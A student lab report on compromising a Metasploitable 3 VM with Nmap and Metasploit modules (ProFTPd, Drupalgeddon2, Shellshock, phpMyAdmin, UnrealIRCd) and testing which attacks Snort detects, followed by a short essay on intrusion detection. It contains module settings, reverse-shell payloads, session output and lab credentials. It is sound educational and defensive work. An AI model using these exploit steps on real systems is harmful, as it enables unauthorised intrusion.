report.txt

To see a more detailed explanation of the project, please visit the repository. Hereoutputs, details and one failed attack were omitted to stay within the word limit, apart from that, in GitHub the report is formatted and not in plain text.
https://github.com/LittleHaku/cybersecurity-proj2

This project goal is to learn how to compromise a virtual machine that is running Metasploitable 3 and Snort to detect possible attacks. The Snort rules that I used were the ones that were given in the snort.conf file in the course. Five attacks will be performed, three of them will be recognized by Snort, but the other two will not be identified.

Before doing any attack, we must first obtain the open ports of the machine, for this, we will use the tool Nmap, which will let us see which ports are open and which services are running on them.

First, we execute the basic Nmap command:

nmap -sV 172.28.128.3

We get the open ports and the services that are running, but we then try with a more in-depth analysis:

sudo nmap -n -sS -sV -sC 172.28.128.3 -p0-65535 -T4 -A -O

With this command we perform an in-depth analysis of all the ports, the main difference is that apart from getting the ports 3500 and 6697 which previously we did not get, we also saw the name of files that are in each of the services.

The output of the command can be seen in the repository, since we have to stay within the word limit I will not include outputs here.

################################
# Identified Attack 1: ProFTPd #
################################

Port 21 is open and running ProFTPd 1.3.5, so the first thing we do is search in Metasploit for scripts that match the service and version. From the list we select "exploit/unix/ftp/proftpd_modcopy_exec" due to its excellent rank and coincidence with version 1.3.5, we configure its options and run the exploit

set rhosts 172.28.128.3
set sitepath /var/www/html
exploit

It failed. Then we try to use a different payload "cmd/unix/reverse_perl" and repeat. This time the exploit works and we get a shell.

With the obtained shell, we see the different files that are in the directory and we see a file named "payroll_app.php" which we examine and see that it contains a chunk of code that validates the user and password, so we now have some credentials that may be useful later (root:sploitme).

Also, we can see that the attack was detected by Snort as a priority 1 attack:

11/16-16:31:14.340657  [**] [1:1356:5] WEB-ATTACKS perl execution attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 172.28.128.1:40327 -> 172.28.128.3:80

###############################
# Identified attack 2: Drupal #
###############################

During the second Nmap scan, a folder named Drupal was discovered on port 80. Subsequently, an exploration into potential exploits for Drupal was initiated using the Metasploit framework:

The search revealed several modules tailored for Drupal, among which "exploit/unix/webapp/drupal_drupalgeddon2" was chosen due to its excellent rank and the use of SQL injection. Numerous payloads were available, with the selected payload being number 18 (php/meterpreter/reverse_tcp). The necessary parameters, such as the target IP (RHOSTS) and the target URI (TARGETURI), were configured, and the exploit was executed

set RHOSTS 172.28.128.3
set TARGETURI /drupal/
execute

It was a successful execution and now we have granted ourselves a Meterpreter shell:

[*] Meterpreter session 7 opened (192.168.0.104:4444 -> 192.168.0.104:54896) at 2023-11-19 23:24:17 +0200

meterpreter > getuid
Server username: www-data

From the VM, we can see that the attack was detected by Snort as a priority 1 attack:

[**] [1:2012887:2] ET POLICY HTTP POST contains pass= in cleartext [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.28.128.1:43547 -> 172.28.128.3:80

###############################
# Identified attack 3: Apache #
###############################

The Nmap scan reveals an open port 80 with the HTTP service, running Apache httpd version 2.4.7. A search for Apache exploits yields a plethora of options, so we refer to Google to find multi/http/apache_mod_cgi_bash_env_exec as a potential exploit. The configuration is very straightforward, and the exploit is executed:

set RHOSTS 172.28.128.3
exploit

The exploit was successful and resulted in the establishment of a Meterpreter shell:

[*] Started reverse TCP handler on 192.168.0.104:4444 
[*] Command Stager progress - 100.00% done (1092/1092 bytes)
[*] Sending stage (1017704 bytes) to 192.168.0.104
[*] Meterpreter session 17 opened (192.168.0.104:4444 -> 192.168.0.104:39530) at 2023-11-20 00:04:31 +0200

meterpreter > getuid
Server username: www-data

From here, we try to list the files in the current directory and a file named "hello_world.sh" is discovered. This file could potentially be executed by some service and thus be an avenue for privilege escalation.

The intrusion did not go unnoticed, as Snort detected the attack and logged it:

11/19-22:04:30.702047  [**] [1:2022028:1] ET WEB_SERVER Possible CVE-2014-6271 Attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 172.28.128.1:42371 -> 172.28.128.3:80

###############################
# Missed Attack 1: PHPMyAdmin #
###############################

Upon accessing the webpage at 172.28.128.3, a PHPMyAdmin page is identified. A search for PHPMyAdmin exploits in Metasploit reveals various options, with the chosen exploit being exploit/multi/http/phpmyadmin_preg_replace due to its excellent rank. Configuration involves setting the target IP (RHOSTS) and the known password, which if we recall from the first attack, we have the credentials (root:sploitme), then we execute the exploit:

set RHOSTS 172.28.128.3
set password sploitme
exploit

The exploit is executed successfully, resulting in a Meterpreter session:

[*] Started reverse TCP handler on 192.168.0.104:4444 
[*] phpMyAdmin version: 3.5.8
[*] The target appears to be vulnerable.
[*] Grabbing CSRF token...
[+] Retrieved token
[*] Authenticating...
[+] Authentication successful
[*] Sending stage (39927 bytes) to 192.168.0.104
[*] Meterpreter session 5 opened (192.168.0.104:4444 -> 192.168.0.104:48186) at 2023-11-19 19:34:59 +0200

Note that the exploit was not detected by Snort, as the attack was not logged, this may be due to the fact that we already had the credentials.

We now know that the previously obtained credentials are working, thus we access the VM 172.28.128.3 from the browser and use these credentials to log into payroll_app.php which gives us a successful login but with no information. We also tried to log in with the credentials on the PHPMyAdmin page leading to a successful login.

Further exploration of the PHPMyAdmin interface uncovers a database named Drupal with a table "users" containing hashed passwords. Additionally, within the MySQL database, a table "users" is found with a hashed root password. Although these hashes are stored for potential future cracking with a tool like John The Ripper. Lastly, we access the database payroll and table users which contains usernames and plain text passwords which can be used to log into the payroll_app.php page and get their information.

An attempt to SSH into the machine using these credentials proves successful, providing a shell. Notably, users Leia, Luke, and Han have sudo privileges:

leia_organa@metasploitable3-ub1404:~$ id
uid=1111(leia_organa) gid=100(users) groups=100(users),27(sudo)

This attack was not detected by Snort.

###############################
# Missed Attack 2: UnrealIRCd #
###############################

In the in-detail Nmap scan, an open port 6697 with the service IRC and version UnrealIRCd is identified. After a search on Metasploit only one exploit is found, exploit/unix/irc/unreal_ircd_3281_backdoor. The exploit shows multiple payloads available, for this case, we will use cmd/unix/reverse_ruby_ssl just to try. We set the IPs and execute the exploit:

set RHOSTS 172.28.128.3
SET LHOST 192.168.0.104
exploit

The following output is obtained:

[*] Started reverse TCP double handler on 192.168.0.104:4444 
[-] 172.28.128.3:6667 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (172.28.128.3:6667) timed out.
[*] Exploit completed, but no session was created.

We see that it is unreachable, this is because the port was not set properly, so we set the port to 6697 and execute the exploit again:

set RPORT 6697
exploit

This time the attack succeeds and a command shell is obtained:

[*] Command shell session 13 opened (192.168.0.104:4444 -> 192.168.0.104:43234) at 2023-11-19 23:50:18 +0200

whoami
boba_fett
id
uid=1121(boba_fett) gid=100(users) groups=100(users),999(docker)

We get shell although not with root privileges, but most surprisingly snort did not detect the attack.

------------------------------------------------------------

The benefits and shortcomings of using intrusion detection systems

Intrusion Detection Systems (IDS) play a pivotal role in fortifying cybersecurity defences, offering both benefits and shortcomings.

Their primary benefit lies in early threat detection through continuous monitoring of network traffic, offering real-time alerts for prompt responses. By detecting potential threats early, IDS can prevent unauthorized access and protect sensitive data. Furthermore, IDS can provide valuable insights into attack patterns, helping to improve future security measures.

However, IDS come with limitations. False positives and negatives can hinder their effectiveness, leading to unnecessary alerts or undetected threats. Signature-based IDS may struggle with new attacks since they require a rule to be able to detect them, and resource-intensive operations can impact network performance. The rise of encrypted traffic poses a challenge, limiting the system's ability to inspect concealed threats.

In conclusion, while IDS are an essential tool in cybersecurity, their effectiveness is contingent upon proper implementation and ongoing management. Despite their shortcomings, the provided benefits in terms of early detection and prevention of intrusions make them a worthwhile investment.